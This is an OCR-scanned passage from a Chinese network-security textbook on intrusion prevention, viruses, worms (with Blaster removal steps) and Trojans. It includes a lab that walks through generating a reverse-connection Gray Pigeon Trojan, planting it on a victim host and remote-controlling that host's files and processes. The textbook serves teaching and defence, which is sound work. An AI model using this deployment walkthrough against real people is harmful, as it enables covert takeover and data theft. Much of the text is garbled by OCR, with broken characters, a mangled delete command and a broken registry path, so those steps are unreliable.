IPS 是 保护 网 络 系 统 的 重要 组 成 部 分 。IPS 基于 IDS, 一 旦 IDS 检测 到 入 侵 行为 就 会 采 
取 一 些 措施 ,通常 是 实时 进行 拦截 。 如 图 5-71 所 示 给 出 了 负载 均衡 的 分 布 式 人 侵 防 御 技术 
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图 5-71 负载 均衡 的 分 布 式 IPS 的 校园 网 网 络 拓扑 结构 


在 校园 网 中 的 应 用 。 
由 于 校园 网 是 一 个 分 层次 的 拓扑 结构 ,所 以 网 络 的 安全 防护 最 好 也 采用 分 层次 的 拓扑 
防护 措施 。 完 整 的 校园 网 安全 解决 方案 应 该 覆盖 网 络 的 各 个 层次 ,并 且 与 安全 管理 相 结合 。 
校园 网 由 核心 层 、 汇 聚 层 和 接 入 层 构 成 。 为 保证 整个 网 络 的 安全 性 ,在 网 络 的 入 口 处 设 
置 防火 墙 ,提供 邮件 过 滤 系 统 等 安全 措施 。 
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510 计算 机 传统 病毒 


如 今 病毒 和 木马 是 互联 网 中 最 热门 的 话题 ,病毒 和 木马 也 让 网 民 们 闻 之 色 变 。 

1. 传统 计算 机 病毒 的 定义 

病毒 一 词 源 自 医学 界 ,后 来 被 用 在 计算 机 中 。 计 算 机 病毒 是 一 组 计算 机 指令 或 者 程 
序 代码 ,能 自我 复制 ,通常 谋 入 在 计算 机 程序 中 ,能 够 破坏 计算 机 功能 或 者 毁坏 数据 , 影 
响 计 算 机 的 使 用 。 像 生物 病毒 一 样 ,计算 机 病毒 有 独特 的 复制 能 力 , 可 以 很 快 地 草 延 , 它 
们 能 把 自身 附着 在 各 种 类 型 的 文件 上 。 一 旦 它 处 于 运行 状态 , 它 就 可 以 感染 其 他 程序 或 
文档 。 当 文件 被 复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ,它们 就 随同 文件 一 起 草 延 开 来 。 
当 某 种 条 件 成 熟 时 ,计算 机 病毒 就 会 自我 复制 ,并 以 磁盘 、 光 盘 、U 盘 和 网 络 等 作为 媒介 进 
行 传播 。 

20 世纪 80 年 代 早期 出 现 了 第 一 批 计算 机 病毒 。 随 着 更 多 的 人 开始 研究 病毒 技术 , 病 
毒 的 数量 .被 攻击 的 平台 数 以 及 病毒 的 复杂 性 和 多 样 性 都 开始 显著 提高 。 

2. 传统 计算 机 病毒 的 特性 

表 5-9 列 出 了 传统 计算 机 病毒 具有 的 特性 。 

表 5-9 传统 计算 机 病毒 具有 的 特性 

特性 Wo 
与 其 他 合法 程序 一 样 , 病 毒 是 一 段 可 执行 程序 ,但 不 是 一 个 完整 的 程序 ,而 是 寄生 在 其 他 
可 执行 性 | 可 执行 程序 上 , 当 病 毒 运行 时 ,便于 合法 程序 争夺 系统 的 控制 权 , 往 往 会 造成 系统 崩溃 , 导 
致 计算 机 瘫痪 
传染 性 “| 病毒 通过 各 种 渠道 从 已 被 感染 的 计算 机 扩散 到 其 他 机 器 上 
一 些 编制 精巧 的 病毒 程序 ,进入 系统 之 后 不 马上 发 作 , 而 是 隐藏 在 合法 文件 中 ,难以 发 现 ， 
一 旦 时 机 成 熟 ,就 四 处 繁殖 .扩散 


潜伏 性 


病毒 具有 预定 的 触发 条 件 ,可 能 是 时 间 .日 期 文件 类 型 或 某 些 特 定数 据 等 。 如 不 满足 , 继 
续 潜 伏 


针对 性 有 些 病 毒 是 针对 特定 的 操作 系统 或 特定 的 计算 机 


可 触发 性 


3. 传统 计算 机 病毒 的 分 类 
CD 按 计算 机 病毒 攻击 的 系统 分 类 ,具体 如 表 5-10 所 示 。 


表 5-10 按 攻击 的 系统 分 类 


被 攻击 系统 说 明 
DOS 这 类 病毒 出 现 最 早 .最 多 ,变种 也 最 多 
Windows 是 病毒 攻击 的 对 象 , 首 例 破坏 计算 机 硬件 的 CIH 病毒 就 是 一 个 
Windows . 
Windows 病毒 
UNIX/Linux UNIX/Linux 是 病毒 攻击 的 主要 对 象 
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COD 按 计算 机 病毒 的 寄生 方式 分 类 ,具体 如 表 5-11 所 示 。 


寄生 方式 


45-0) 按 寄生 方式 分 类 
说 明 


文件 型 病毒 


文件 型 病毒 主要 以 感染 文件 扩展 名 为 . COM, EXE 和 . OVL 等 可 执行 程序 为 主 ,大 
多 数 文件 型 病毒 都 是 常 驻 在 内 存 中 的 ,文件 型 病毒 分 为 源码 型 病毒 `. 典 和 人 型 病毒 和 外 
壳 型 病毒 


源码 型 病毒 


源码 型 病毒 攻击 高 级 语言 编写 的 程序 ,该 病毒 在 高 级 语言 所 编写 的 程序 编译 前 插入 
源 程 序 中 ,经 编译 成 为 合法 程序 的 一 部 分 


嵌入 型 病毒 


嵌入 型 病毒 是 将 自身 嵌 人 现 有 程序 中 ,把 计算 机 病毒 的 主体 程序 与 其 攻击 的 对 象 以 
插入 的 方式 链接 。 这 种 计算 机 病毒 编写 难度 较 大 ,不 过 ,一 旦 侵入 程序 体 后 也 较 难 
消除 


外 壳 型 病毒 


外 壳 型 病毒 是 目前 流行 的 文件 型 病毒 ,这 类 病毒 寄生 在 宿主 程序 的 前 面 或 后 面 ,并 修 
改 程序 的 第 一 条 指令 ,使 病毒 先 于 宿主 程序 执行 ,这 样 随 着 宿主 程序 的 使 用 而 传染 扩 
散 ,这 种 病毒 最 为 常见 ,易于 编写 ,也 易于 发 现 


操作 系统 型 
病毒 


这 种 病毒 在 运行 时 ,用 自己 的 逻辑 部 分 取代 操作 系统 的 合法 程序 模块 ,根据 病毒 自身 
的 特点 和 被 替代 的 操作 系统 中 合法 程序 模块 在 操作 系统 中 运行 的 地 位 与 作用 以 及 病 
毒 取代 操作 系统 的 取代 方式 等 ,对 操作 系统 进行 破坏 ,这 种 病毒 具有 很 强 的 破坏 力 ， 
可 以 导致 整个 系统 的 瘫 次 。 通 常 ,这 类 病毒 作为 操作 系统 的 一 部 分 ,只 要 计算 机 开始 
工作 ,病毒 就 处 在 随时 被 触发 的 状态 


引导 型 病毒 


引导 型 病毒 是 一 种 在 ROM BIOS 运行 之 后 ,系统 引导 时 执行 的 病毒 。 引 导 型 病毒 会 
去 改写 ( 即 感染 ) 磁 盘 上 引导 扇 区 的 内 容 , 或 者 改写 硬盘 上 的 分 区 表 (FAT)。 引 导 型 
病毒 主要 是 用 病毒 的 全 部 或 部 分 代码 代替 正常 的 引导 记录 ,而 将 正常 的 引导 记录 转 
移 到 磁盘 的 其 他 地 方 。 由 于 引导 区 是 磁盘 能 正常 使 用 的 先决 条 件 ,因此 ,这 种 病毒 在 
运行 的 一 开始 (如 系统 启动 ) 就 能 获得 控制 权 ,其 传染 性 较 大 


混合 型 病毒 


指 具有 引导 型 病毒 和 文件 型 病毒 寄生 方式 的 计算 机 病毒 ,所 以 它 的 破坏 性 更 大 ,传染 
的 机 会 也 更 多 ,消除 也 更 困难 


宏 病 毒 


这 是 一 种 寄存 在 文档 或 模板 的 宏 中 的 计算 机 病毒 。 一 旦 打开 这 样 的 文档 ,其 中 的 宏 
就 会 被 执行 ,于 是 宏 病 毒 就 会 被 激活 ,转移 到 计算 机 上 ,并 驻 留 在 Normal 模板 上 。 从 
此 以 后 所 有 自动 保存 的 文档 都 会 感染 上 这 种 宏 病 毒 ,如 果 其 他 用 户 打 开 了 感染 病毒 
的 文档 , 宏 病 毒 又 会 转移 到 该 用 户 的 计算 机 上 


(3) 按 计算 机 病毒 的 破坏 情况 分 类 ,具体 如 表 5-12 所 示 。 


表 5-12 ” 按 破 坏 情况 分 类 


类 型 说 明 
良性 计算 机 病毒 是 指 不 包含 对 计算 机 系统 产生 直接 破坏 作用 代码 的 程序 。 这 类 
良性 计算 机 病毒 病毒 为 了 表现 其 存在 ,只 是 不 停 地 进行 扩散 ,从 一 台 计 算 机 传染 到 另 一 台 ,并 不 
破坏 计算 机 内 的 数据 
恶性 5 SE É R E 
恶性 计算 机 病毒 性 计算 机 病毒 是 指 包 含 对 计算 机 系统 产生 直接 破坏 作用 代码 的 程序 ,病毒 发 


作 时 ,不 是 摧毁 分 区 表 ,导致 无 法 启动 ,就 是 直接 格式 化 硬盘 
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(4) 按 计算 机 病毒 激活 的 时 间 分 类 ,具体 如 表 5-13 所 示 。 
表 5-13” 按 激活 的 时 间 分 类 


类 型 说 明 
定时 有 的 病毒 会 潜伏 一 段 时 间 , 等 到 它 所 设置 的 时 间 才 发 作 
随机 随机 病毒 一 般 不 是 由 时 钟 来 激活 的 


(5) 按 传播 媒介 分 类 ,具体 如 表 5-14 所 示 。 
表 5-14 按 传播 媒介 分 类 
类 型 说 9 
单机 病毒 的 载体 是 磁盘 ,常见 的 是 病毒 从 软盘 、 光 盘 或 U 盘 传人 硬盘 ,感染 系统 , 然 


单机 病毒 | 后 再 传染 其 他 软盘 或 U 盘 ,进而 传染 其 他 系统 
网 络 病毒 ”| 网 络 病毒 的 传播 媒介 是 网 络 ,因此 这 种 病毒 的 传 蘑 能 旋 更 强 


4. 传统 计算 机 病毒 传染 的 前 提 条 件 

计算 机 病毒 传染 的 前 提 条 件 是 计算 机 系统 的 运行 .磁盘 的 读 写 。 

只 要 计算 机 系统 运行 就 会 有 磁盘 读 写 操作 ,因此 病毒 传染 的 两 个 条 件 很 容易 满足 。 计 
算 机 系统 运行 为 病毒 驻 留 内 存 创造 了 条 件 ,病毒 传染 的 第 一 步 是 驻 留 内 存 , 然 后 寻找 传染 机 
会 ,寻找 可 攻击 的 对 象 ,判断 条 件 是 否 满足 ,如 果 满 足 则 进行 传染 ,将 病毒 写 人 磁盘 系统 。 

5. 目前 反 病 毒 的 成 熟 技 术 

目前 反 病 毒 的 成 熟 技术 是 “特征 码 查 杀 ”, 工 作 流 程 是 : 截获 病毒 ,分 析 病毒 并 且 提取 特 
征 码 , 升 级 病毒 库 。 尽 管 这 种 技术 已 经 非常 成 熟 可 靠 ,但 是 随 着 新 病毒 的 快速 出 现 ,使 得 这 
种 被 动 式 的 杀毒 技术 总 是 落后 于 新 病毒 的 产生 。 


511 蠕虫 病毒 


从 1988 年 11 月 2 日 Robert Morris Jr 编写 的 第 一 个 基于 BSD UNIX 的 Internet 
Worm 蠕虫 病毒 以 来 ,计算 机 蠕虫 病毒 以 其 快速 ,多样 化 的 传播 方式 不 断 给 网 络 世界 带 来 灾 
害 ,Internet 安全 威胁 事件 每 年 以 指数 增长 ,特别 是 网 络 的 迅速 发 展 使 得 蠕虫 造成 的 危害 日 
益 严 重 , 比 如 2001 年 7 一 8 月 份 的 Code Red 蠕虫 ,在 爆发 后 的 9 小 时 内 就 攻击 了 25 万 台 计 
TEBL. 2003 年 8 月 12 日 的 冲击 波 Blaster 蠕虫 的 大 规模 爆发 也 给 互联 网 用 户 带 来 了 极 大 
的 损失 。 

1. 蠕虫 病毒 的 基本 概念 

蠕虫 是 计算 机 病毒 的 一 种 ,是 利用 计算 机 网 络 和 安全 漏洞 来 复制 自身 的 一 小 段 代码 , 蠕 
虫 代码 可 以 扫描 网 络 来 查找 具有 特定 安全 漏洞 的 其 他 计算 机 ,然后 利用 该 安全 漏洞 获得 计 
算 机 的 部 分 或 全 部 控制 权 并 且 将 自身 复制 到 计算 机 中 ,然后 又 从 新 的 位 置 开 始 进行 复制 。 

注意 : 蠕虫 是 互联 网 最 大 的 威胁 ,因为 蠕虫 在 自我 复制 时 将 会 耗 尽 计 算 机 的 处 理 器 时 
间 以 及 网 络 的 带宽 ,并 且 它 们 通常 还 有 一 些 恶意 目 的 ,蠕虫 的 超大 规模 爆发 能 使 网 络 逐 渐 陷 
于 疗 首 状态 。 如 果 有 一 天 发 生 网 络 战争 ,蠕虫 将 会 是 网 络 世 界 中 的 原子 弹 。 
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2. 网 络 蠕虫 和 病毒 的 区 别 
蠕虫 与 病毒 的 最 大 不 同 在 于 它 在 没有 人 为 干预 的 情况 下 不 断 地 进行 自我 复制 和 传播 。 
表 5-15 列 出 了 病毒 和 蠕虫 的 主要 区 别 。 


表 5-15 病毒 和 蠕虫 的 区 别 


区 别 说 明 
存在 形式 病毒 是 寄生 体 ,蠕虫 是 独立 体 
复制 形式 病毒 是 插入 宿主 文件 ,蠕虫 是 自身 进行 复制 
传染 机 制 病毒 是 利用 宿主 程序 的 运行 ,蠕虫 是 利用 系统 漏洞 
触发 传染 病毒 是 由 计算 机 的 使 用 者 触发 ,蠕虫 是 由 程序 自身 触发 
攻击 目标 病毒 主要 攻击 本 地 文件 ,蠕虫 主要 攻击 网 络 上 的 其 他 计算 机 
影响 重点 病毒 主要 影响 文件 系统 ,蠕虫 主要 影响 网 络 性 能 和 系统 性 能 
3. 蠕虫 的 工作 流程 


蠕虫 程序 的 工作 流程 可 以 分 为 漏洞 扫描 、 攻 击 、 传 染 、 现 场 处 理 4 个 阶段 。 蠕 虫 程序 随 
机 选取 某 一 段 IP 地 址 (也 可 以 采取 其 他 的 TP. 生成 策略 ), 对 这 一 地 址 段 上 的 主机 进行 扫描 ， 
扫描 到 有 漏洞 的 计算 机 系统 后 ,就 开始 利用 自身 的 破坏 功能 获取 主机 的 相应 权限 ,并 且 将 里 
虫 主体 复制 到 目标 主机 。 然 后 ,蠕虫 程序 进入 被 感染 的 系统 ,对 目标 主机 进行 现场 处 理 , 现 
场 处 理 部 分 的 工作 包括 隐藏 和 信息 搜集 等 。 同 时 ,蠕虫 程序 生成 多 个 程序 副本 ,重复 上 述 流 
程 ,将 蠕虫 程序 复制 到 新 主机 并 启动 。 

4. 蠕虫 的 行为 特征 

通过 对 蠕虫 工作 流程 的 分 析 , 归 纳 出 了 它 的 行为 特征 ,如 表 5-16 所 示 。 


表 5-16 蠕虫 的 行为 特征 


特 dE 说 明 
自我 繁殖 当 蠕 虫 被 释放 后 ,从 搜索 漏洞 ,到 利用 搜索 结果 攻击 系统 ,再 到 复制 副本 ,整个 流程 全 
由 蠕虫 自身 自动 完成 。 蠕 虫 在 本 质 上 已 经 演变 为 黑客 人 侵 的 自动 化 工具 
任何 计算 机 系统 都 存在 各 种 各 样 的 漏洞 ,有 的 是 操作 系统 本 身 的 问题 ,有 的 是 应 用 服 
利用 软件 漏洞 务 程序 的 问题 ,有 的 是 网 络 管理 人 员 的 配置 问题 ,这 些 漏洞 使 得 蠕虫 获得 被 攻击 计算 
机 系统 的 相应 权限 ,进行 复制 和 传播 成 为 可 能 
在 扫描 网 络 计算 机 的 过 程 中 ,蠕虫 需要 判断 其 他 计算 机 是 否 存在 判断 特 定 应 用 服务 
造成 网 络 拥塞 是 否 存 在 、 判 断 漏洞 是 否 存 在 等 ,这 不 可 避免 地 会 产生 附加 的 网 络 数 据 流量 。 同 时 里 
虫 的 副本 还 在 不 同 机 器 之 间 被 传递 ,因此 会 产生 巨 量 的 网 络 流量 ,最 终 导致 整个 网 络 
的 瘫痪 ,造成 巨大 的 经 济 损失 
蠕虫 人 侵 到 计算 机 系统 之 后 ,会 在 被 感染 的 计算 机 上 产生 自己 的 多 个 副本 ,每 个 副本 
消耗 系统 资源 | 都 会 启动 搜索 程序 寻找 新 的 攻击 目标 ,大 量 的 蠕虫 副本 进程 会 耗费 系统 的 许多 资源 ， 
导致 系统 性 能 的 下 降 
留 下 安全 隐患 多 数 蠕虫 会 搜集 .扩散 和 暴露 系统 的 敏感 信息 ,并 在 系统 中 留 下 后 门 ,这 就 称 为 未 来 
的 安全 隐患 
5. 蠕虫 的 危害 
蠕虫 的 危害 有 两 个 方面 。 


(1) 蠕虫 大 量 而 快速 的 复制 使 得 网 络 上 的 扫描 数据 包 迅 速 增多 ,占用 大 量 带宽 ,造成 网 
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络 拥 塞 ,进而 使 网 络 竣 痪 。 
(2) 网 络 上 存在 漏洞 的 主机 被 扫描 到 以 后 ,会 被 迅速 感染 ,可 能 造成 管理 员 权 限 被 
窃取 。 


6. 蠕虫 病毒 的 一 般 防治 方法 

使 用 具有 实时 监控 功能 的 杀毒 软件 ,不 要 轻易 打开 不 熟悉 电子 邮件 的 附件 等 。 

7.“ 冲 击 波 ” 蠕 虫 病毒 的 清除 

“冲击 波 ” 是 一 种 利用 Windows 系统 的 RPC( 远 程 过 程 调用 ) 漏 洞 进行 传播 .随机 发 作 、 
破坏 力 强 的 蠕虫 病毒 。 它 不 需要 通过 电子 邮件 (或 附件 ) 来 传播 ,更 隐蔽 ,更 不 易 察 觉 。 它 使 
用 IP 扫描 技术 来 查找 网 络 上 操作 系统 为 Windows 2000/XP/2003 的 计算 机 ,一旦 找到 有 漏 
洞 的 计算 机 , 它 就 会 利用 DCOM( 分 布 式 对 象 模型 ,一 种 协议 ,能 够 使 软件 组 件 通 过 网 络 直 
接 进行 通信 )RPC 缓冲 区 漏洞 植 入 病毒 体 以 控制 和 攻击 该 系统 。 

“冲击 波 ” 中 毒 症状 : 系统 资源 紧张 ,应 用 程序 运行 速度 异常 ; 网 络 速度 减 慢 ,用 户 不 能 
正常 浏览 网 页 或 收发 电子 邮件 ; 不 能 进行 复制 .粘贴 操作 ; Word, Excel, PowerPoint 等 软 
件 无 法 正常 运行 ; 系统 无 故 重启 ,或 在 弹出 “系统 关机 ”警告 提示 后 自动 重启 等 。 

注意 : 关闭 “系统 关机 ”提示 框 的 方法 是 在 出 现 关 机 提示 时 ,选择 “开始 ”一 “运行” 命令 ， 
在 打开 的 对 话 框 中 输入 “shutdown -a” 命 令 并 执行 即 可 。 

“冲击 波 ? 里 虫 病毒 的 清除 过 程 如 下 。 

第 1 步 : 中 止 进程 。 在 Windows 任务 管理 器 的 “进程 ”选项 卡 中 查找 msblast. exe( 或 
teekids. exe, penis32. exe) ,选中 它 ,然后 单 击 下 方 的 “结束 进程 ?按钮 。 

提示 : 也 可 以 在 命令 提示 符 窗口 执行 命令 taskkill. exe /im msblast. exe( 或 taskkill 
. exe/im teekids. exe, taskkill. exe /im penis32. exe). 

第 2 步 : 删除 病毒 体 。 搜 索 msblast. exe( 或 teekids. exe、penis32. exe) ,在 “搜索 结果 ” 
窗口 中 将 找到 的 文件 彻底 删除 。 

提示 : 在 Windows XP 系统 中 ,应 首先 禁用 “系统 还 原 ” 功 能 ,方法 是 : 右 击 “ 我 的 计算 
机 ”, 选 择 “ 属 性 ”, 在 打开 的 “系统 属性 ”对 话 框 中 选择 "系统 还 原 ” 选 项 卡 中 色 选 “在 所 有 驱动 
器 上 关闭 系统 还 原 ” 选 项 即 可 。 也 可 以 在 命令 提示 符 窗口 执行 如 下 命令 : 


Del Z At fi ff \windows\system\msblast. exe(Windows XP 系统 ) 


第 3 步 : 修改 注册 表 。 打 开 注 册 表 编辑 器 ,依次 找到 HKEY LOCAL. MACHINEV 
SOFTWARE\ Microsoft \ Windows \ Current Version \ Run. 删除 windows auto update = 
msblast. exe( 病 毒 变 种 可 能 会 有 不 同 的 显示 内 容 )。 

第 4 步 : 重启 计算 机 。 重 启 计算 机 后 ,“ 冲 击 波 ” 蠕 虫 病毒 就 从 系统 中 完全 清除 了 。 


512 特洛伊 木马 


如 今 的 网 络 是 木马 横行 的 时 代 , 各 种 各 样 的 木马 在 威胁 着 重要 信息 的 安全 。 
5.12.1 特洛伊 木马 的 基本 概念 


特 伊 洛 木 马 (Trojan Horse) 源 于 古 希 腊 特 洛 伊 战 争 中 著名 的 “木马 屠城 记 ”, 传 说 古 希 
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腊 有 大 军 围攻 特洛伊 城 , 数 年 不 能 攻 下 。 后 来 想 出 了 一 个 木马 计 , 制 造 一 只 高 二 丈 的 大 木马 
假装 作战 马 神 ,让 士兵 藏匿 于 巨大 的 木马 中 。 攻 击 数 天 后 仍然 无 功 ,大 部 队 假装 撤退 而 将 木 
马 按 弃 于 特洛伊 城下 ,城中 敌人 得 到 解围 的 消息 ,将 木马 作为 战利品 拖 入 城内 ,全 城 饮酒 狂 
欢 。 木 马 内 的 士兵 则 乘 夜 晚 敌 人 庆祝 胜利 、 放 松 警 惕 的 时 候 从 木马 中 扑 出 来 ,开启 城 门 及 四 
处 纵火 ,与 城 外 的 部 队 里 应 外 合 而 攻 下 了 特洛伊 城 。 后 来 称 这 只 木马 为 “特洛伊 木马 ”。 

1. 特 伊 洛 木马 的 定义 

在 计算 机 领域 ,特洛伊 木马 只 是 一 个 程序 , 它 驻 留 在 目标 计算 机 中 , 随 计 算 机 启动 而 自 
动 启动 ,并 且 在 某 一 端口 进行 监听 ,对 接收 到 的 数据 进行 识别 ,然后 对 目标 计算 机 执行 相应 
的 操作 。 特 伊 洛 木马 一 般 是 指 利用 系统 漏洞 或 通过 欺骗 手段 被 植 人 远程 用 户 的 计算 机 系统 
中 的 ,通过 修改 启动 项 或 捆绑 进程 方式 自动 运行 .并 且 具 有 控制 该 目标 系统 或 进行 信息 窃取 
等 功能 ,运行 时 一 般 用 户 很 难 察觉 。 特 洛 伊 木马 不 会 自动 进行 自我 复制 。 

特洛伊 木马 实质 上 只 是 一 种 远程 管理 工具 .本 身 没 有 伤害 性 和 感染 性 ,因此 不 能 称 为 病 
毒 ,不 过 也 有 人 称 为 第 二 代 病 毒 ,原因 是 如 果 有 人 使 用 不 当 , 其 破坏 力 可 能 比 病毒 更 强 。 另 
外 ,特洛伊 木马 与 病毒 和 恶意 代码 不 同 的 是 ,木马 程序 隐蔽 性 很 强 。 

特洛伊 木马 包括 两 个 部 分 : 被 控 端 和 控制 端 。 

CD 被 控 端 。 又 称 服 务 端 ,将 其 植 和 人 要 控制 的 计算 机 系统 中 ,用 于 记录 用 户 的 相关 信 
息 ,比如 密码 .账号 等 ,相当 于 给 远程 计算 机 系统 安装 了 一 个 后 门 。 

(2) 控制 端 。 又 称 客户 端 , 黑 客 用 来 发 出 控制 命令 ,比如 传输 文件 .屏幕 截图 .键盘 记 
录 , 甚 至 是 格式 化 硬盘 等 。 

2. 特 伊 洛 木马 的 类 型 

常见 的 特 伊 洛 木马 有 正 向 连接 木马 和 反 向 连接 木马 。 

(1) 正 向 连接 木马 

正 向 连接 木马 是 在 中 木马 者 的 机 器 上 开 个 端口 ,黑客 去 连接 这 个 端口 ,前提 条 件 是 要 知 
道中 木马 者 的 IP 地 址 。 

但 是 ,由 于 现在 越 来 越 多 的 人 使 用 宽带 上 网 ,并且 还 可 能 使 用 了 路 由 器 ,这 就 造成 了 正 
向 连接 木马 的 使 用 困难 。 具 体 原 因 如 下 。 

CD 宽带 上 网 。 每 次 上 网 的 IP 地 址 不 同 (DHCP) ,就 算 对 方 中 了 木马 ,但 是 中 木马 者 下 
次 上 网 时 IP 地 址 又 改变 了 。 

© 路 由 器 。 多 个 计算 机 共用 一 条 宽带 ,假如 路 由 器 的 IP 地 址 是 210. 12. 24. 34, 内 网 计算 
机 的 IP 地 址 是 192. 168. X. X ,外界 是 无 法 访问 192. 168. X. Xx 的 ,就 算 中 了 木马 也 没 用 。 

(2) 反 向 连接 木马 

为 了 解决 正 向 连接 木马 的 不 足 , 出 现 了 反 向 连接 木马 。 

反 向 连接 木马 让 中 木马 者 来 连接 黑客 .不管 中 木马 者 的 IP 地 址 如 何 改变 ,都 能 够 被 控 
制 。 但 是 ,如 果 黑 客 的 IP 地 址 改变 了 ,中 木马 者 就 不 能 连接 黑客 的 计算 机 了 ,解决 该 问题 的 
方法 是 中 木马 者 通过 域名 来 连接 黑客 的 计算 机 :只 要 黑客 申请 一 个 域名 即 可 。 

3. 木马 传播 方式 

CD 利用 邮箱 传播 木马 。 

(2) 网 站 主页 挂 马 。 

(3) 论坛 漏洞 挂 马 。 
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(4) 文件 类 型 伪装 。 

(5) QQ 群发 网 页 木马 。 

(6) 图 片 木马 .RM 木马 、Flash 木马 。 
(7) 在 Word 文档 中 加 入 木马 文件 。 
(D JH BT 制作 木马 种 子 。 

(9) 黑客 工具 中 绑 定 木 马 。 

(10) 伪装 成 应 用 程序 的 扩展 组 件 。 


5.12.2 实例 : 反 向 连接 木马 的 传播 


1. 实验 环境 
实验 环境 如 图 5-72 所 示 。 
192.168.10.1 
gs 192.168.10.5 
Windows 2003 Windows XP 
被 入 侵 者 ， 木 马 服务 器 端 。 黑客 ， 木 马 客户 端 


图 5-72 实验 环境 


2. 生成 木马 的 服务 器 端 

SI: 下 载 并 安装 灰 蚤 子 。 

第 2 步 : 配置 反 向 连接 木马 。 

运行 灰 鸟 子 , 主 界面 如 图 5-73 Eoo “配置 服务 程序 ”, 弹 出 如 图 5-74 所 示 的 对 


[alax] [elo 
ARF TES 


5-73 ” 灰 钥 子 主 界面 
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话 框 ,选择 “自动 上 线 设 置 ”选项 卡 ,在 此 需要 强调 的 是 ,由 于 是 配置 反 向 连接 木马 ,所 以 
一 定 要 在 IP 栏 中 输入 黑客 (客户 端 ) 的 IP 地 址 192. 168. 10. 5, 其 他 配置 信息 根据 界面 提示 
进行 设置 ,如 图 5-75 一 图 5-77 所 示 。HKFX2008_OK. exe 是 最 终生 成 的 反 向 连接 木马 服务 
器 端 。 


RÀ 
amne E Tommi ud Siaa DANGER. 
—e 


z[E Documents and Setuines WE 


图 5-74 自动 上 线 设 置 


Ty € inr. EXE 进程 局 动 服务 编程 序 
网 隐 次 服务 演进 程 。 只 女 持 Win2000/xp 系统 
说 明 : 


8 TEXPLORE EXE 进程 启动 只 支持 Wia2000/ 季 系统 
mA OSM Wx 加 过 


图 5-76 ”启动 项 设置 图 5-77 高 级 选项 


3. 把 木马 服务 器 端 植 入 他 人 的 计算 机 

木马 的 传播 方式 主要 有 两 种 。 

一 种 是 通过 电子 邮件 ,控制 端 将 木马 程序 以 邮件 附件 的 形式 发 出 去 , 收 信 人 只 要 打开 附 
件 ,系统 就 会 感染 木马 。 

另 一 种 是 软件 下 载 , 一 些 非 正 规 的 网 站 以 提供 软件 下 载 为 名 义 ,将 木马 捆绑 在 软件 安装 
程序 上 ,下 载 后 ,只 要 一 运行 这 些 程序 ,木马 就 会 自动 安装 。 

本 实验 主要 介绍 黑客 是 如 何 使 用 木马 程序 来 控制 被 入 侵 计算 机 的 ,所 以 直接 将 反 向 连 
接 木 马 服务 器 端 HKFX2008 OK. exe 复制 到 了 被 入 侵 计 算 机 (192. 168. 10. 1. 
ZTG2003) 中 。 

接 下 来 运行 HKFX2008 OK. exe, 反 向 连接 木马 就 会 自动 进行 安装 ,首先 将 自身 复制 
到 C:\Windows 或 C:\Windows\system 目录 下 ,然后 在 注册 表 启动 组 . 非 启 动 组 中 设置 
好 木马 的 触发 条 件 ,这样 木马 的 安装 就 完成 了 。 
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4. 黑客 进行 远程 控制 

由 于 是 反 向 连接 木马 ,所 以 服务 器 端 上 线 后 就 会 自动 连接 客户 端 (黑客 ) ,在 主 界面 中 
( 见 图 5-78) 可 以 看 到 ZTG2003 已 经 与 黑客 计算 机 连接 了 , 即 被 黑客 控制 。 

在 图 5-78 中 的 “文件 管理 器 ”选项 卡 中 ,可 以 像 使 用 “Windows 资源 管理 器 ”一 样 来 新 
建 , 删 除 、 重 命名 、 下 载 被 人 侵 计算 机 中 的 文件 。 


JEI aro IAD ww 


Ue rem gg 


5-78 远程 控制 ZTG2003 一 一 文件 管理 器 
在 图 5-79 中 的 “远程 控制 命令 ”选项 卡 中 ,可 以 查看 被 入 侵 计算 机 的 系统 信息 ; 可 以 查 
看 、 终 止 被 入 侵 计 算 机 的 进程 ; 可 以 启动 .关闭 被 入 侵 计算 机 的 服务 等 。 


(E KEBRI ADVTYIMWAE 192.160.10.5, 109,254. 109. .239.1,192.169.05.1. Eole] | 
i IPO 设置 @) IAO 帮助 0D 


\SysteaRoot\Systen32\sass. exe 
VPPAC: NIDDDOTSVsystmszvesrss exe 
WAC: MITIOTS sys ten32 wi nlogon. exe. 


C: WINDOIS sys ten32 servi ces. exe. 
C: WINIOTS sys ten32 Vl sas. ex 
C: WINDOTS syst en32\svehost 


图 5-79 远程 控制 ZTG2003 一 一 远程 控制 命令 
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远程 进程 管理 类 命令 执行 成 功 . 下 年 10:02:20 
1 


读 职 进程 列表 命令 发 送 成 功 
远程 进程 管理 类 命令 执行 成 功 .下午 10:05:37 
16 个 对 象 当前 路径 ; C:\ 黑 防 俘虏 : 1 台 


HB x8 


图 5-80 ”远程 控制 ZTG2003 一 一 命令 广播 


5. 手工 清除 灰 驶 子 

确认 灰 铝 子 的 服务 进程 名 称 , 假 如 是 HKFX2008_OK ,在 桌面 右 击 “我 的 计算 机 ”图 标 ， 
在 右键 菜单 中 选择 “服务 "命令 ,在 弹出 的 “服务 ”窗口 中 禁止 HKFX2008_OK 服务 , 右 击 该 
服务 ,在 右键 菜单 中 选择 “属性 ”命令 ,在 属性 对 话 框 中 得 到 该 服务 文件 的 位 置 ,将 其 删除 
即 可 。 
5.12.3 实例: 查看 开放 端口 判断 木马 

木马 通常 基于 TCP/UDP 协议 进行 Client 端 与 Server 端 之 间 的 通信 ,因此 ,木马 会 在 
Server 端 打开 监听 端口 来 等 待 Client 端 连接 。 例 如 冰河 的 监听 端口 是 7626。 所 以 可 以 通 
过 查看 本 机 开放 的 端口 来 检查 是 否 被 植 人 了 木马 或 其 他 黑客 程序 。 

下 面 使 用 Windows 自 带 的 netstat 命令 (Linux 也 有 该 命令 ) 查 看 端口 。 


C:\Documents and Settings\Administrator > netstat -an 
Active Connections 


Proto Local Address Foreign Address State 

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 
TCP 127.0.0.1:1038 127.0.0.1:1039 ESTABLISHED 
TCP 127.0.0.1:1039 127.0.0.1:1038 ESTABLISHED 
TCP 218.198.18.6:139 0.0.0.0:0 LISTENING 
TCP 218.198.18.6:1064 211.84.160.6:80 TIME WAIT 
TCP 218.198.18.6:1065 211.84.160.6:80 TIME WAIT 
TCP 0.0.0.0:7626 0.0.0. 0: 0OLISTENING 

UDP 0.0.0.0:445 *ix* 

UDP 218.198.18.6:123 *:* 
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Active Connections: 指 当前 本 机 活动 连接 。 

Proto: 连接 使 用 的 协议 。 

Local Address; 本 地 计算 机 的 IP 地 址 和 连接 正在 使 用 的 端口 号 。 

